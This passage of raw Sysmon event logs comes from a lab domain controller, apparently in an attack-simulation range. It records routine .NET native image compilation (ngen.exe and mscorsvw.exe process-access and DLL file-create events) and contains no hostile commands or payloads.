YSTEM32\ntdll.dll+51791 10341000x80000000000000008937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.170{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A8-6000-CF04-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.170{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A8-6000-CF04-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:04.108{08A6967A-46A8-6000-CE04-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8ac-0\System.Windows.Presentation.dll2021-01-14 13:27:04.108 10341000x80000000000000008934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A8-6000-CE04-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.999{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A8-6000-CE04-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.999{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A8-6000-CE04-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:05.936{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A9-6000-D104-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:05.921{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A9-6000-D104-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:05.921{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A9-6000-D104-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:05.796{08A6967A-46A8-6000-D004-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13cc-0\System.Workflow.Activities.dll2021-01-14 13:27:05.796 10341000x80000000000000008948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:06.046{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AA-6000-D204-000000009A01}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:06.030{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46AA-6000-D204-000000009A01}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:06.030{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AA-6000-D204-000000009A01}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:08.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AC-6000-D404-000000009A01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:08.374{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46AC-6000-D404-000000009A01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:08.374{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AC-6000-D404-000000009A01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:08.280{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AC-6000-D304-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:08.233{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46AC-6000-D304-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:08.233{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AC-6000-D304-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:08.061{08A6967A-46AA-6000-D204-000000009A01}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1208-0\System.Workflow.ComponentModel.dll2021-01-14 13:27:08.061 10341000x80000000000000008959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:09.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AD-6000-D504-000000009A01}4668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:09.686{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46AD-6000-D504-000000009A01}4668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:09.686{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AD-6000-D504-000000009A01}4668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:09.561{08A6967A-46AC-6000-D404-000000009A01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1254-0\System.Workflow.Runtime.dll2021-01-14 13:27:09.561 11241100x80000000000000008963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:10.905{08A6967A-46AE-6000-D604-000000009A01}1384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\568-0\System.WorkflowServices.dll2021-01-14 13:27:10.905 10341000x80000000000000008962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:10.108{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AE-6000-D604-000000009A01}1384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:10.093{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46AE-6000-D604-000000009A01}1384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 